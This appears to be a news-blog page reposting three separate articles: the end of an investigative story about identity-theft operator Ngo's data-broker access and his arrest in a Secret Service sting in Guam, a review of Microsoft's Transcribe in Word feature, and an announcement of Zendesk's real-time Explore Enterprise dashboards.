The U.K. cybercriminal, acting at the behest of the Secret Service and U.K. authorities, told Ngo that if he wanted to maintain his access, he could agree to meet up in person. But Ngo didn’t immediately bite on the offer.

Instead, he weaseled his way into another huge data store. In much the same way he’d gained access to Court Ventures, Ngo got an account at a company called TLO, another data broker that sells access to extremely detailed and sensitive information on most Americans.

TLO’s service is accessible to law enforcement agencies and to a limited number of vetted professionals who can demonstrate they have a lawful reason to access such information. In 2014, TLO was acquired by Trans Union, one of the other three big U.S. consumer credit reporting bureaus.

And for a short time, Ngo used his access to TLO to power a new iteration of his business — an identity theft service rebranded as usearching[.]info. This site also pulled consumer data from a payday loan company that Ngo hacked into, as documented in my Sept. 2012 story, ID Theft Service Tied to Payday Loan Sites. Ngo said the hacked payday loans site gave him instant access to roughly 1,000 new fullz records each day.

Ngo’s former ID theft service usearching[.]info.

BLINDED BY GREED

By this time, Ngo was a multi-millionaire: His various sites and reselling agreements with three Russian-language cybercriminal stores online had earned him more than USD $3 million. He told his parents his money came from helping companies develop websites, and even used some of his ill-gotten gains to pay off the family’s debts (its electronics business had gone belly up, and a family member had borrowed but never paid back a significant sum of money).

But mostly, Ngo said, he spent his money on frivolous things, although he says he’s never touched drugs or alcohol.

“I spent it on vacations and cars and a lot of other stupid stuff,” he said.

When TLO locked Ngo out of his account there, the Secret Service used it as another opportunity for their cybercriminal mouthpiece in the U.K. to turn the screws on Ngo yet again.

“He told Ngo he’d locked him out again, and the he could do this all day long,” O’Neill said. “And if he truly wanted lasting access to all of these places he used to have access to, he would agree to meet and form a more secure partnership.”

After several months of conversing with his apparent U.K.-based tormentor, Ngo agreed to meet him in Guam to finalize the deal. Ngo says he understood at the time that Guam is an unincorporated territory of the United States, but that he discounted the chances that this was all some kind of elaborate law enforcement sting operation.

“I was so desperate to have a stable database, and I got blinded by greed and started acting crazy without thinking,” Ngo said. “Lots of people told me ‘Don’t go!,’ but I told them I have to try and see what’s going on.”

But immediately after stepping off of the plane in Guam, he was apprehended by Secret Service agents.

“One of the names of his identity theft services was findget[.]me,” O’Neill said. “We took that seriously, and we did like he asked.”

This is Part I of a multi-part series. Check back tomorrow (Aug. 27) for Part II, which will examine what investigators learned following Ngo’s arrest, and delve into his more recent effort to right the wrongs he’s done.

Microsoft brings transcriptions to Word

/0 Comments/in /by

Microsoft today launched Transcribe in Word, its new transcription service for Microsoft 365 subscribers, into general availability. It’s now available in the online version of Word, with other platforms launching later. In addition, Word is also getting new dictation features, which now allow you to use your voice to format and edit your text, for example.

As the name implies, this new feature lets you transcribe conversations, both live and pre-recorded, and then edit those transcripts right inside of Word. With this, the company goes head-to-head with startups like Otter and Google’s Recorder app, though they all have their own pros and cons.

Image Credits: Microsoft

To get started with Transcribe in Word, you simply head for the Dictate button in the menu bar and click on “Transcribe.” From there, you can record a conversation as it happens — by recording it directly through a speakerphone and your laptop’s microphone, for example — or by recording it in some other way and then uploading that file. The service accepts .mp3, .wav, .m4a and .mp4 files.

As Dan Parish, Microsoft principal group PM manager for Natural User Interface & Incubation, noted in a press briefing ahead of today’s announcement, when you record a call live, the transcription actually runs in the background while you conduct your interview, for example. The team purposely decided not to show you the live transcript, though, because its user research showed that it was distracting. I admit that I like to see the live transcript in Otter and Recorder, but maybe I’m alone in that.

Like with other services, Transcribe in Word lets you click on individual paragraphs in the transcript and then listen to that at a variety of speeds. Because the automated transcript will inevitably have errors in it, that’s a must-have feature. Sadly, though, Transcribe doesn’t let you click on individual words.

One major limitation of the service right now is that if you like to record offline and then upload your files, you’ll be limited to 300 minutes, without the ability to extend this for an extra fee, for example. I know I often transcribe far more than five hours of interviews in any given month, so that limit seems low, especially given that Otter provides me with 6,000 minutes on its cheapest paid plan. The max length for a transcript on Otter is four hours while Microsoft’s only limit for is a 200MB file upload limit, with no limits on live recordings.

Another issue I noticed here is that if you mistakenly exit the tab with Word in it, the transcription process will stop and there doesn’t seem to be a way to restart it.

It also takes quite a while for the uploaded files to be transcribed. It takes roughly as long as the conversations I’ve tried to transcribe, but the results are very good — and often better than those of competing services. Transcribe for Word also does a nice job separating out the different speakers in a conversation. For privacy reasons, you must assign your own names to those — even when you regularly record the same people.

It’d be nice to get the same feature in something like OneNote, for example, and my guess is Microsoft may expand this to its note-taking app over time. To me, that’s the more natural place for it.

Image Credits: Microsoft

The new dictation features in Word now let you give commands like “bold the last sentence,” for example, and say “percentage sign” or “ampersand” if you need to add those symbols to a text (or “smiley face,” if those are the kinds of texts you write in Word).

Even if you don’t often need to transcribe text, this new feature shows how Microsoft is now using its subscription service to launch new premium features to convert free users to paying ones. I’d be surprised if tools like the Microsoft Editor (which offers more features for paying users), this transcription service, as well as some of the new AI features in the likes of Excel and PowerPoint, didn’t help to convert some users into paying ones, especially now that the company has combined into a single bundle Office 365 and Microsoft 365 for consumers. After all, just a subscription to something like Grammarly and Otter would be significantly more expensive than a Microsoft 365 subscription.

 

New Zendesk dashboard delivers customer service data in real time

/0 Comments/in /by

Zendesk has been offering customers the ability to track customer service statistics for some time, but it has always been a look back. Today, the company announced a new product called Explore Enterprise that lets customers capture that valuable info in real time, and share it with anyone in the organization, whether they have a Zendesk license or not.

While it has had Explore in place for a couple of years now, Jon Aniano, senior VP of product at Zendesk says the new enterprise product is in response to growing customer data requirements. “We now have a way to deliver what we call Live Team Dashboards, which delivers real-time analytics directly to Zendesk users,” Aniano told TechCrunch.

In the days before COVID that meant displaying these on big monitors throughout the customer service center. Today, as we deal with the pandemic, and customer service reps are just as likely to be working from home, it means giving management the tools they need to understand what’s happening in real time, a growing requirement for Zendesk customers as they scale, regardless of the pandemic.

“What we’ve found over the last few years is that our customers’ appetite for operational analytics is insatiable, and as customers grow, as customer service needs get more complex, the demands on a contact center operator or customer service team are higher and higher, and teams really need new sets of tools and new types of capabilities to meet what they’re trying to do in delivering customer service at scale in the world,” Aniano told TechCrunch.

One of the reasons for this is the shift from phone and email as the primary ways of accessing customer service to messaging tools like WhatsApp. “With the shift to messaging, there are new demands on contact centers to be able to handle real-time interactions at scale with their customers,” he said.

In order to meet that kind of demand, it requires real-time analytics that Zendesk is providing with this announcement. This arms managers with the data they need to put their customer service resources where they are needed most in the moment in real time.

But Zendesk is also giving customers the ability to share these statistics with anyone in the company. “Users can share a dashboard or historical report with anybody in the company regardless of whether they have access to Zendesk. They can share it in Slack, or they can embed a dashboard anywhere where other people in the company would like to have access to those metrics,” Aniano explained.

The new service will be available starting on August 31 for $29 per user per month.